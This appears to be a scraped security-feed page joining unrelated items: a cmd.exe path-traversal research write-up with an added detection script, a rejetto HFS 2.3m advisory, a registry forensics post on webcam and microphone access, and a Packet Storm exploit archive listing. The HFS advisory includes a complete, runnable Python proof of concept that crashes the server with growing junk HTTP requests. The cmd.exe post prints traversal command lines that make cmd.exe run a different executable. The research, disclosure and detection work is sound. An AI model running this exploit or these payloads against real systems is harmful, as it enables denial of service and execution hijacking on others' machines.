I know this looks silly enough to suggest I found it while ramming that sample PHP code over HTTP with Burp while watching Procmon with proper filters... or something like that (which isn't such a bad idea by the way)... as opposed to writing a custom cmd.exe fuzzer (no, you don't need to tell me my code is far from elegant, I couldn't care less), then, after obtaining rather boring and disappointing results, spending weeks on static analysis with Ghidra (thanks NSA, I am literally in love with this tool), followed up with more weeks of further work with Ghidra while simultaneously manually debugging with x64dbg while further expanding comments in the Ghidra project 😂

cmd.exe command line processing starts in the CheckSwitches function (which gets called from Init, which itself gets called from main). CheckSwitches is responsible for determining what switches (like /c, /k, /v:on etc.) cmd.exe was called with. The full list of options can be found in the cmd.exe /? help (which, by the way, to my surprise, reflects the actual functionality pretty well). I spent a good deal of time analyzing it carefully, looking for hidden switches, logic issues allowing to smuggle multiple switches via the command line by jumping out of the double quotes, quote-stripping issues and whatever else would just manifest to me as I dug in.

The beginning of the CheckSwitches function after some naming edits and notes I took

If the /c switch is detected, processing moves to the actual command line enclosed in double quotes - which is the most common mode cmd.exe is used in and the only one the rest of this write-up is about:

The same mode can be attained with the /r switch:

After some further logic, doing, among other things, parsing the quoted string and making some sanity fixes (like removing any spaces if any are found at its beginning), a function with a very encouraging and self-explanatory name is called:

Disassembly view:

Decompiler view:

At this point it was clear it was high time for debugging to come into play. By default x64dbg will set up a breakpoint at the entry point - mainCRTStartup. This is a good opportunity to set an arbitrary command line:

Then start cmd.exe once again (Debug -> Restart).

We also set up a breakpoint at the top of the SearchForExecutable function, so we catch all its instances. We run into the first instance of SearchForExecutable:

We can see that the double-quoted proper command line (after cmd.exe skips the preceding cmd.exe /c) along with its double quotes is held in RBX and R15. Also, the value on the top of the stack (right bottom corner) contains an address pointing at CheckSwitches - it's the saved RET. So we know this instance is called from CheckSwitches. If we hit F9 again, we will run into the second instance of SearchForExecutable, but this time the command line string is held in RAX, RDI and R11, while the call originates from another function named ECWork:

This second instance resolves and returns the full path to ping.exe. Below we can see the body of the ECWork function, with a call to SearchForExecutable (marked black). This is where the RIP was when the screenshot was taken - right before the second call of SearchForExecutable:

Now, on the screenshot below the SearchForExecutable call has already returned (note the full path to ping.exe pointed at by the address held in R14). Fifteen instructions later the ExecPgm function is called, using the newly resolved executable path to create the new process:

So - seeing SearchForExecutable being called against the whole ping 127.0.0.1 string (uh yeah, those evil spaces) suggests potential confusion between the full command line and an actual file name... So this gave me the initial idea to check whether the executable could be hijacked by literally creating one under a name equal to the command line that would make it run:

Uh really? Interesting.

I decided to have a look with Procmon in order to see what file names cmd.exe attempts to open with CreateFile:

So yes, the result confirmed opening a copy of calc.exe from the file literally named ping .PNG in the current working directory:

Now, interestingly, I would not see any results with this Procmon filter (Operation = CreateFile) if I did not create the file first... One would expect to see cmd.exe mindlessly calling CreateFile against nonexistent files with names being various mutations of the command line, with a NAME NOT FOUND result - the usual way one would search for potential DLL side loading issues... But NOT in this case - cmd.exe actually checks whether such a file exists before calling CreateFile, by calling QueryDirectory instead:

For this purpose, in Procmon, it is more accurate to specify a filter based on the payload's unique magic string (like PNG in this case, as this would be the string we as attackers could potentially control) occurring in the Path property instead of filtering based on the Operation.

"So, anyway, this isn't very useful" - I thought and got back to x64dbg. "We can only hijack the command if we can literally write a file under a very dodgy name into the target application's current directory..." - I kept thinking - "... Current directory... u sure ONLY current directory?" - and at this point my path traversal reflex lit up, a seemingly crazy and desperate idea to attempt traversal payloads against parts of the command line parsed by SearchForExecutable. Which made me manually change the command line to ping 127.0.0.1/../calc.exe and restart debugging... while already thinking of modifying the cmd.exe fuzzer in order to throw a set of payloads generated for this purpose with psychoPATH against cmd.exe... But that never happened because of what I saw after I hit F9 one more time. Below we can see x64dbg with cmd.exe run with the cmd.exe /c "ping 127.0.0.1/../calc.exe" command line (see RDI).

We are hanging right after the second SearchForExecutable call, the one originating from the bottom of the ECWork function. Just a few instructions before calling ExecPgm, which is about to execute the PE pointed to by R14. The full path to C:\Windows\System32\calc.exe present in R14 is the result of the just-returned SearchForExecutable("ping 127.0.0.1/../calc.exe") call preceding the current RIP:

The traversal appears to be relative to a subdirectory of the current working directory (calc.exe is at c:\windows\system32\calc.exe).

"Or maybe this is just a result of a failed path traversal sanity check, only removing the first occurrence of ../?" - I kept wondering. So I dug further into the SearchForExecutable function, also trying to find the answer why variants of the argument created by splitting it by spaces are considered and why the most-to-the-right one is chosen first when found. I narrowed down the culprit code to the instructions within the SearchForExecutable function, between the call of mystrcspn at 14000ff64 and then the call of the FullPath function at 14001005b and exists_ex at 140010414:

In the meantime I received the following feedback from Microsoft:

We do have a blog post that helps describe the behavior you have documented: https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats. Cmd.exe first tries to interpret the whole string as a path: the "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe” string is being treated as a relative path, so “ping 127.0.0.1” is interpreted as a segment in that path, and is removed due to the preceding “../”. This should help explain why you shouldn’t be able to use the user controlled input string to pass arguments to the executable. There are a lot of cases that would require that behaviour, e.g. cmd.exe /c "....\Program Files (x86)\Internet Explorer\iexplore.exe" - we wouldn’t want that to try to run some program “....\Program” with the argument “Files (x86)\Internet Explorer\iexplore.exe”. It’s only if the full string can’t be resolved to a valid path that it splits on spaces and takes everything before the first space as the intended executable name (hence why “ping 127.0.0.1” does work).

So yeah... those evil spaces and quoting. From this point, I only escalated the issue by confirming the possibility of traversing to arbitrary directories as well as the ability to force execution of PE files with arbitrary extensions. Interestingly, this slightly resembles the common unquoted service path issue, except that in this case the most-to-the-right variant gets prioritized.

The disclosure

Upon discovery I documented and reported this peculiarity to MSRC. After a little less than six days the report was picked up and reviewed. About a week later Microsoft completed their assessment, concluding that this does not meet the bar for security servicing:

On one hand, I was a little disappointed that Microsoft would not address it and I was not getting the CVE in cmd.exe I have wanted for some time. On the other hand, at least nothing's holding me back from sharing it already and hopefully it will be around for some time so we can play with it.

It's not a vulnerability, it's a technique

I would like to thank Microsoft for making all of this possible - and for being nice enough to even offer me a review of this post! Which was completely unexpected, but obviously highly appreciated.

Some reflections

Researching stuff can sometimes appear to be a lonely and thankless journey, especially after days and weeks of seemingly fruitless drudging and sculpturing - but I realized this is just a short-sighted perception, in which success is exclusively measured by the number of uncovered vulnerabilities/features/interesting behaviors (no point to argue about the terminology here).

In offensive security we rarely pay attention to the stuff we tried and failed, even though those failed attempts are equally important - as if we did not try, we would never know what's there (and risk false negatives). Curiosity and the need to know. And software is full of surprises. Plus, simply dealing with a particular subject (like analyzing a given program/protocol/format) and gradually getting more and more familiar with it feeds our minds with new mental models, which makes us automatically come up with more and more ideas for potential bugs, scenarios and weird behaviors as we keep hacking. A journey through code accompanied by new inspirations, rewarded with new knowledge and the peace of mind resulting from answering questions... sometimes ending with the great satisfaction of a unique discovery.

Source
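Two things a defender takes from the post above: a filter that only strips command separators never sees this payload (the fix is an allow-list plus passing the argument as its own argv element, the equivalent of the quoting the author mentions), and the Sysmon process-creation event gives it away because the child image no longer matches the command named at the start of its command line. The Python below is an added example, not the post's code or its PHP sample; the target regex, the event fields and the sample events are constructed here, modelled on the Sysmon fields the post shows.

```python
import ntpath
import re
from dataclasses import dataclass

# --- Invoking side: why separator filtering is not enough, and the safe form ---
COMMAND_SEPARATORS = set("&|;\n`$<>")   # what a typical OS command injection filter rejects


def passes_separator_filter(arg: str) -> bool:
    """True when a deny-list filter like the PHP example's would let `arg` through."""
    return not any(c in COMMAND_SEPARATORS for c in arg)


_HOST_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_PING_TARGET_RE = re.compile(
    r"^(?:\d{1,3}(?:\.\d{1,3}){3}|" + _HOST_LABEL + r"(?:\." + _HOST_LABEL + r")*)$")


def is_valid_ping_target(host: str) -> bool:
    """Allow-list: a dotted quad or a DNS name; no slashes, spaces or '..' segments."""
    return bool(_PING_TARGET_RE.match(host))


def ping_argv(host: str) -> list:
    """Hardened form: validated target, passed as its own argv element (shell=False),
    so no `cmd.exe /c "..."` string is ever built for cmd.exe to re-interpret as a path."""
    if not is_valid_ping_target(host):
        raise ValueError(f"rejected ping target: {host!r}")
    return ["ping", "-n", "1", host]


# --- Detection side: Sysmon-style process creation events ---
@dataclass
class ProcessEvent:
    image: str
    command_line: str
    parent_image: str
    parent_command_line: str


TRAVERSAL_RE = re.compile(r"(?:^|[\s\\/])\.\.(?:[\\/]|$)")


def first_token(command_line: str) -> str:
    """The command as a naive reader sees it: a quoted run, or text up to the first space."""
    s = command_line.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(None, 1)[0] if s else ""


def base_name(path_or_cmd: str) -> str:
    """Lower-cased file name without extension; ntpath handles '\\' paths on any OS."""
    return ntpath.splitext(ntpath.basename(path_or_cmd.replace("/", "\\")))[0].lower()


def hijack_indicators(ev: ProcessEvent) -> list:
    """Reasons why a child of cmd.exe does not match the command its command line names."""
    reasons = []
    if base_name(ev.parent_image) != "cmd":
        return reasons
    token = first_token(ev.command_line)
    intended, actual = base_name(token), base_name(ev.image)
    if TRAVERSAL_RE.search(ev.command_line):
        reasons.append("command line contains a '..' path segment")
    # A bare name like `ping` must resolve to ping.exe. A first token that is itself a
    # path (`C:\Program`) is the legitimate unquoted-path case Microsoft describes; skip it.
    if intended and not re.search(r"[\\/:]", token) and intended != actual:
        reasons.append(f"command line names {intended!r} but the image is {actual!r}")
    return reasons


def scan(events: list) -> list:
    """(index, reasons) for every event that carries at least one indicator."""
    hits = []
    for i, ev in enumerate(events):
        reasons = hijack_indicators(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [  # constructed samples, not captured logs
    ProcessEvent(r"C:\Windows\System32\PING.EXE", "ping 127.0.0.1", CMD,
                 'cmd.exe /c "ping 127.0.0.1"'),
    ProcessEvent(r"C:\Windows\System32\calc.exe",
                 "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe", CMD,
                 'cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe"'),
    ProcessEvent(r"C:\Program Files (x86)\Internet Explorer\iexplore.exe",
                 r"C:\Program Files (x86)\Internet Explorer\iexplore.exe", CMD,
                 r'cmd.exe /c "C:\Program Files (x86)\Internet Explorer\iexplore.exe"'),
    ProcessEvent(r"C:\xampp\tmp\cmd.png", "ping 127.0.0.1/../../../../xampp/tmp/cmd.png", CMD,
                 'cmd.exe /c "ping 127.0.0.1/../../../../xampp/tmp/cmd.png"'),
]

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i].image} <- {SAMPLE_EVENTS[i].command_line}")
        for why in reasons:
            print("   ", why)
```

The bare-name rule also fires for legitimate launchers that start a differently named binary, so it needs an allow-list in production; the traversal rule stands on its own.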
-
- 3
-
Tagged with: cve-2020-12669, cve-2020-12743 (and 4 more)
-
Design circuits quickly and easily with a modern and intuitive user interface with drag-and-drop, copy/paste, zoom & more. Take control of debugging by pausing the simulation and watching the signal propagate as you advance step-by-step. Don't worry about multiple platforms on student computers. Install on both Windows and macOS. Demo Download Trial Source
-
This tool enumerates hostnames from Bing.com for an IP address. Bing.com is Microsoft's search engine, which has an IP: search parameter. Written in Bash for Linux. Requires wget.
-
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.rejetto.com

[Product]
HFS Http File Server v2.3m Build 300

[Vulnerability Type]
Remote Buffer Overflow (DoS)

[CVE Reference]
CVE-2020-13432

[Security Issue]
rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers like Cookie, User-Agent etc.

Remote unauthenticated attackers can send concurrent HTTP requests using an incrementing or specific payload range of junk characters for values in the URL parameters or HTTP headers sent to the server. This results in an hfs.exe server crash from an invalid pointer write access violation.

Requirements:
hfs.exe must have at least one saved virtual file or folder present.
Test using a remote IP and NOT from the same machine (localhost).

Dump...

(e4c.3a8): Access violation - code c0000005 (first/second chance not available)
For analysis of this file, run !analyze -v
WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b0000 esi=00000000 edi=00000002
eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
ntdll!RtlpResolveAssemblyStorageMapEntry+0x18:
777ef8b4 53              push    ebx

0:000> !load winext/msec
0:000> !exploitable
WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
*** WARNING: Unable to verify checksum for hfs.exe
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0000000000000018 (Hash=0x7a29717c.0x325e6a71)

PROCESS_NAME:  hfs.exe

FOLLOWUP_IP:
hfs+8fad7
0048fad7 8945f0          mov     dword ptr [ebp-10h],eax

WRITE_ADDRESS:  000a0e08

[References]
https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01

[Exploit/POC]

from socket import *
import sys

# HFS HTTP File Server v2.3m build 300.
# Vendor: www.rejetto.com
# Remote Buffer Overflow DoS
# Note: hfs.exe must have at least one saved virtual file or folder on the target.
# Test using a remote IP and not from the same machine.
# Discovery: hyp3rlinx
# hyp3rlinx.altervista.org
# ISR: ApparitionSec
#=========================================================================

res = b""
once = 0
cnt = 0
max_requests = 1666

def hfs_dos():
    global ip, port, length, res, once, cnt, max_requests
    cnt += 1
    length += 1
    # Each request grows the junk value by one byte.
    payload = "A" * length
    s = socket(AF_INET, SOCK_STREAM)
    s.settimeout(2)
    try:
        s.connect((ip, port))
        # The same junk in an HTTP header (e.g. Cookie) also triggers the crash.
        ##bof = "HEAD / HTTP/1.1\r\nHost: " + ip + "\r\nCookie: " + payload + "\r\n\r\n"
        bof = "HEAD /?mode=" + payload + " HTTP/1.1\r\nHost: " + ip + "\r\n\r\n"
        s.send(bof.encode("utf-8"))
        if once == 0:
            # Read the banner once to confirm the target is up and is HFS 2.3m.
            once += 1
            res = s.recv(128)
            if res:
                print("Targets up please wait...")
                if "HFS 2.3m" not in str(res):
                    print("[!] Non vulnerable HFS version, exiting :(")
                    sys.exit()
    except Exception as e:
        if "timed out" in str(e):
            if not res:
                print("[!] Target is not up or behind a firewall? :(")
            else:
                # It answered earlier and no longer does: hfs.exe has crashed.
                print("[!] Done!")
            sys.exit()
    finally:
        s.close()
    if cnt == max_requests:
        return False
    return True

def msg():
    print("HFS HTTP File Server v2.3m build 300.")
    print("Unauthenticated Remote Buffer Overflow (DoS - PoC)")
    print("Virtual HFS saved file or folder required.")
    print("Run from a different machine (IP) than the target.")
    print("By Hyp3rlinx - ApparitionSec\n")

if __name__ == "__main__":
    length = 3
    if len(sys.argv) != 3:
        msg()
        print("Usage: <hfs.exe Server>, <Port (usually 8080)>")
        sys.exit()
    ip = sys.argv[1]
    port = int(sys.argv[2])
    msg()
    while True:
        if not hfs_dos():
            print("[!] Failed, non vuln version or no virtual files exist :(")
            break

[POC Video URL]
https://www.youtube.com/watch?v=qQ-EawfXuWY

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: May 18, 2020
Vendor reply: May 18, 2020
Vendor confirm vulnerability: May 19, 2020
Vendor creates fix: May 20, 2020
Vendor released new version 2.4 : June 7, 2020
June 8, 2020 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source
-
In certain investigations, it may arise that you need to find the following:

What process was using the camera or microphone?
When was the last session?
How long was that session?

Using the contents of the following reg keys, you can determine when and how long a process had access to privacy-protected resources. These resources include the microphone, webcam, bluetooth, location, contacts and more. For this blog, I will focus on the microphone and webcam as an example.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\

Below is an example of the typical entries in the webcam directory. There are several entries, including Microsoft and non-Microsoft applications. Microsoft applications are stored as child keys, but non-Microsoft applications (which are of the most interest) are stored in the NonPackaged child key.

Within the NonPackaged directory, you can see that the names of the keys are the full path of an executable with # replacing \. Each entry has two values, LastUsedTimeStart and LastUsedTimeStop, with the timestamps in FILETIME format.

From the example above, you are able to determine that Zoom.exe had access to my webcam for 27.2 minutes (between 2020/06/01 04:30:52 UTC and 2020/06/01 04:58:04 UTC).

Whether you are looking at what processes had access to a webcam or even trying to prove how long a user's conversation may have been, this is a great source of information.

Testing RAT-like behaviour

I needed to test if this also applied to more malicious methods of accessing the microphone. I used a meterpreter post-exploit module to record audio from a Windows VM. As soon as I ran the recording command, a new entry was populated from where my meterpreter shell was executed. Pretty cool!

Monitoring

If we wanted to track all sessions (not just the last), it is easy with Sysmon. If you are running something like the SwiftOnSecurity configuration, you will need to add an inclusion line for event IDs 12, 13 and 14 (registry modification):

<TargetObject condition="contains">SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\</TargetObject> <!-- When a process accesses bluetooth, location, webcam, microphone etc, the timestamps of last access are updated here. HKLM and HKCU -->

After updating your configuration, a Sysmon event will now be created when the registry keys are created or updated. Below is the LastUsedTime key being updated for Skype.exe accessing my microphone in the Sysmon event log. The timestamps in the log are still in hex, which need to be converted to decimal and then to a human-readable timestamp; however, the timestamp of the event itself is also very accurate.

Conclusion

What spurred this off is when I came across this page in the settings, and it got me thinking about where this data is stored. It will be interesting if there are other places that track historical sessions without the use of monitoring. This would be more valuable to forensic analysts that don't always have nice logs. Further research also could be done to identify which device the process is accessing (front camera, USB camera etc). I would also like to explore if this method catches more covert RAT malware.

Thanks for reading,
Zach

Source
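The two decoding steps the post describes (FILETIME in the ConsentStore values, and the hex QWORD in a Sysmon Event ID 13) are shown below as an added example; this is not code from Zach's post. It parses a `reg export` of the ConsentStore branch and turns each NonPackaged entry into a session record with start, stop and duration. The .reg text is constructed for the example (the Zoom.exe path and user name are invented; the two FILETIME values encode the post's 04:30:52 and 04:58:04 UTC timestamps), and the `QWORD (0xHIGH-0xLOW)` rendering of Sysmon's Details field is an assumption you should confirm against your own Sysmon version.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample: what `reg export` of the webcam ConsentStore branch looks like.
# The executable path and the two FILETIME values are made up for this example
# (they encode 2020-06-01 04:30:52 UTC and 04:58:04 UTC, matching the post's Zoom case).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Users#lab#AppData#Roaming#Zoom#bin#Zoom.exe]
"LastUsedTimeStart"=hex(b):00,66,c1,6e,cd,37,d6,01
"LastUsedTimeStop"=hex(b):00,d6,80,3b,d1,37,d6,01
"""

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
KEY_RE = re.compile(r"\\ConsentStore\\([^\\]+)\\(NonPackaged\\)?([^\\]+)$")
VALUE_RE = re.compile(r'^"([^"]+)"=hex\(b\):(.*)$')
# Assumed Sysmon rendering of a QWORD registry value in the Event ID 13 Details field.
SYSMON_QWORD_RE = re.compile(r"QWORD \(0x([0-9A-Fa-f]{8})-0x([0-9A-Fa-f]{8})\)")


def filetime_to_datetime(filetime):
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def reg_qword(hexdata):
    """Decode the 'hex(b):aa,bb,...' little-endian byte list of an exported REG_QWORD."""
    raw = bytes.fromhex(hexdata.replace(",", "").replace(" ", ""))
    return int.from_bytes(raw, "little")


def parse_consent_store(reg_text):
    """Return one session record per ConsentStore entry that carries both timestamps."""
    # reg export wraps long hex lists with a trailing backslash; undo that first.
    text = reg_text.replace("\\\r\n", "").replace("\\\n", "")
    sessions, key, values = [], None, {}

    def flush():
        if key is None or not all(v in values for v in ("LastUsedTimeStart", "LastUsedTimeStop")):
            return
        m = KEY_RE.search(key)
        if not m:
            return
        resource, nonpackaged, entry = m.groups()
        start = filetime_to_datetime(values["LastUsedTimeStart"])
        stop_ft = values["LastUsedTimeStop"]
        # A stop value of 0 means the device was still in use when the hive was captured.
        stop = filetime_to_datetime(stop_ft) if stop_ft else None
        sessions.append({
            "resource": resource,
            # Win32 apps sit under NonPackaged with '#' in place of '\' in the exe path;
            # packaged (Store) apps are keyed by package family name and kept verbatim.
            "process": entry.replace("#", "\\") if nonpackaged else entry,
            "start": start,
            "stop": stop,
            "duration_s": int((stop - start).total_seconds()) if stop else None,
        })

    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            flush()
            key, values = line[1:-1], {}
            continue
        m = VALUE_RE.match(line)
        if m:
            values[m.group(1)] = reg_qword(m.group(2))
    flush()
    return sessions


def sysmon_qword_to_int(details):
    """Decode the Details field of a Sysmon Event ID 13 for a QWORD value (assumed format)."""
    m = SYSMON_QWORD_RE.fullmatch(details.strip())
    if not m:
        raise ValueError("not a Sysmon QWORD details string: %r" % details)
    return (int(m.group(1), 16) << 32) | int(m.group(2), 16)


if __name__ == "__main__":
    for s in parse_consent_store(SAMPLE_REG):
        print("%-10s %s" % (s["resource"], s["process"]))
        print("  start %s  stop %s  duration %ss" % (s["start"], s["stop"], s["duration_s"]))
    # The same start timestamp as it would appear in a Sysmon Event ID 13 (constructed).
    ft = sysmon_qword_to_int("QWORD (0x01D637CD-0x6EC16600)")
    print("sysmon:", filetime_to_datetime(ft))
```

Run it against a real export with `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore" consent.reg` and feed the file contents to `parse_consent_store`; the per-user copy under HKCU can be exported the same way.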
-
This archive contains all of the 166 exploits added to Packet Storm in May, 2020.

Content:

Directory of \202005-exploits\202005-exploits\2005-exploits

06/02/2020 07:13 AM <DIR> .
06/02/2020 07:13 AM <DIR> ..
05/21/2020 07:37 PM 1,121 absolutetelnet1121-dos.txt
05/15/2020 05:53 PM 5,758 ACal_v2.2.6-1Click-RCE.py.txt
05/04/2020 08:19 PM 1,021 addressbook9001-sql.txt
05/01/2020 04:44 PM 1,138 apacheofbiz171203-xsrf.txt
05/27/2020 07:18 PM 405 bindtsig-dos.txt
05/02/2020 10:22 PM 1,606 blogengine33-xxe.txt
05/04/2020 07:32 PM 1,014 boltwire603-lfi.txt
05/06/2020 05:37 PM 945 bookedscheduler277-traversal.txt
05/07/2020 06:20 PM 1,183 carparkms10-sql.txt
05/12/2020 11:09 PM 1,284 ciscodnac1314-xss.txt
05/20/2020 11:06 PM 5,210 cloudme1112seh-overflow.txt
05/11/2020 06:33 PM 1,212 complaintms10-sql.txt
05/21/2020 01:02 AM 2,738 composrcms10030-xss.txt
05/07/2020 06:30 PM 1,606 cpm107-xss.txt
05/20/2020 06:57 PM 3,316 craftcms3vcard-exec.txt
05/29/2020 06:46 PM 3,397 crystalshard020-bypass.txt
05/16/2020 12:32 AM 4,845 CSNC-2010-001.txt
05/11/2020 06:32 PM 1,454 cutenews212-filedelete.txt
05/12/2020 11:07 PM 3,887 cutenews212-upload.txt
05/01/2020 10:22 PM 2,873 CVE-2020-1967-master.zip
05/08/2020 11:03 PM 15,526 cve_2020_0668_service_tracing.rb.txt
05/14/2020 11:53 PM 2,107 damewarers1211273-overflow.txt
05/19/2020 02:55 AM 2,684 dolibarr1103-xss.txt
05/22/2020 05:39 PM 2,055 druvainsync663-escalate.txt
05/12/2020 11:18 PM 5,034 druva_insync_insynccphwnet64_rcp_type_5_priv_esc.rb.txt
05/14/2020 11:57 PM 3,901 ecommercesys10-exec.txt
05/28/2020 07:09 PM 1,331 eyoucms146-xss.txt
05/17/2020 01:22 PM 853 filetto10-dos.txt
05/02/2020 12:22 PM 1,155 flashget196-overflow.txt
05/18/2020 05:22 AM 1,239 formalms2302-xss.txt
05/21/2020 07:35 PM 1,793 formalms5640-xsrf.txt
05/04/2020 08:07 PM 3,204 Frigate_v3.36_SEH_Buffer_Overflow.py.txt
05/06/2020 05:32 PM 10,536 gitlab1290-fileread.txt
05/24/2020 01:11 PM 3,541 goldwave570seh-overflow.txt
05/01/2020 04:53 PM 5,461 GS20200501135300.tgz
05/08/2020 11:12 PM 7,870,938 GS20200508201239.tgz
05/08/2020 11:14 PM 7,734 GS20200508201435.tgz
05/08/2020 11:22 PM 8,844 GS20200508202219.txt
05/12/2020 05:45 PM 5,255 GS20200512144520.tgz
05/12/2020 11:14 PM 17,445 GS20200512201356.tgz
05/12/2020 11:15 PM 9,637,250 GS20200512201532.tgz
05/15/2020 05:51 PM 1,584 GS20200515145103.txt
05/28/2020 07:23 PM 34,746 GS20200528162322.tgz
05/22/2020 02:59 AM 5,068 GymManagementSystem_v10_RCE.py.txt
05/17/2020 10:22 PM 1,325 hplinuxki601-exec.txt
05/04/2020 07:37 PM 6,001 hp_xglance_priv_esc.rb.txt
05/06/2020 12:10 AM 4,306 ibm_drm_a3user.rb.txt
05/06/2020 12:12 AM 12,056 ibm_drm_rce.rb.txt
05/07/2020 06:21 PM 1,044 ichat16-xss.txt
05/06/2020 05:33 PM 1,151 idoitoscmdb1141-filedelete.txt
05/02/2020 07:22 PM 604 joomlaadagency609-sql.txt
05/26/2020 05:45 PM 3,617 joomlaxclonerbackup353-disclose.txt
05/09/2020 09:22 PM 7,823 kartris16-upload.txt
05/06/2020 05:59 PM 3,259 kentico_staging_syncserver.rb.txt
05/14/2020 11:59 PM 9,952 KL-001-2020-002.txt
05/16/2020 09:55 PM 1,850 konicaminoltaftputility10-dos.txt
05/27/2020 08:02 PM 966 kuicmsphpee20-xss.txt
05/12/2020 11:13 PM 2,992 lansend32-overflow.txt
05/11/2020 06:35 PM 1,761 librenms146-sql.txt
05/27/2020 08:44 PM 1,899 limesurvey4111-xss.txt
05/12/2020 11:03 PM 3,703 makewhatis_exploit.py.txt
05/15/2020 05:49 PM 6,225 manageenginesd10-xss.txt
05/16/2020 09:32 PM 733 mikrotikrms123-sql.txt
05/06/2020 05:39 PM 2,069 mpcsharj3111-filedownload.txt
05/05/2020 11:58 PM 1,516 neceeiiiwebpro010301-enumerate.txt
05/14/2020 11:55 PM 1,539 netlink-exec.txt
05/12/2020 11:18 PM 5,799 netsweeper_webadmin_unixlogin.rb.txt
05/28/2020 07:08 PM 841 nokiavsspm2020-sql.txt
05/08/2020 11:05 PM 5,069 ntusermndragover.rb.txt
05/19/2020 05:41 PM 4,991 nukevietvms4400-xsrf.txt
05/11/2020 06:26 PM 1,925 oacfmsuname10-sql.txt
05/25/2020 10:02 PM 963 odfs10-exec.txt
05/18/2020 07:39 PM 1,591 ohms10-sql.txt
05/18/2020 07:38 PM 3,137 ohprms10-sql.txt
05/07/2020 06:15 PM 2,426 onlineagroculturefms10-sql.txt
05/18/2020 07:42 PM 2,326 onlinechattingsystem10-sql.txt
05/07/2020 06:26 PM 799 onlineclothingstore10-fileupload.txt
05/06/2020 05:52 PM 1,159 onlineclothingstore10-sql.txt
05/06/2020 05:53 PM 759 onlineclothingstore10-xss.txt
05/18/2020 07:37 PM 3,090 onlineexaminationsystem10-sql.txt
05/28/2020 07:18 PM 541 onlineexamsystem2015-sql.txt
05/27/2020 08:02 PM 4,297 onlinemrs10-xss.txt
05/21/2020 02:02 AM 1,426 openedxironwood25-exec.txt
05/26/2020 05:39 PM 5,058 openemr-exec.txt
05/05/2020 11:44 PM 2,807 oracledb11g-unquotedpath.txt
05/18/2020 07:49 PM 2,181 oraclehospitalityres370057-exec.txt
05/12/2020 10:58 PM 1,933 orchardcorerc1-xss.txt
05/05/2020 11:46 PM 1,116 oss10-sql.txt
05/03/2020 09:22 PM 1,497 osticket1141-xss.txt
05/28/2020 01:02 AM 9,058 osticket1141multi-xss.txt
05/04/2020 07:52 PM 1,565 outlineservice133-unquotedpath.txt
05/19/2020 11:29 PM 3,314 oxdovecot-nullpointerdos.txt
05/27/2020 05:44 PM 1,459 oxideshop634-sql.txt
05/29/2020 01:11 PM 2,012 panaceasoft-shell.txt
05/21/2020 02:01 AM 3,280 phpfusion903050persistent-xss.txt
05/19/2020 05:42 PM 1,563 phpfusion90350-sql.txt
05/05/2020 11:47 PM 1,721 phreebookserp525-exec.txt
05/10/2020 05:44 PM 3,435 pihole44-exec.txt
05/10/2020 09:22 PM 4,458 pihole44-execescalate.txt
05/27/2020 07:23 PM 10,192 pihole440-exec.txt
05/18/2020 07:50 PM 8,516 pihole_blocklist_exec.rb.txt
05/28/2020 07:27 PM 8,878 pihole_dhcp_mac_exec.rb.txt
05/26/2020 05:50 PM 4,737 pihole_whitelist_exec.rb.txt
05/06/2020 05:40 PM 3,490 pisay_v1_SQLi_AuthBypass_RCE.py.txt
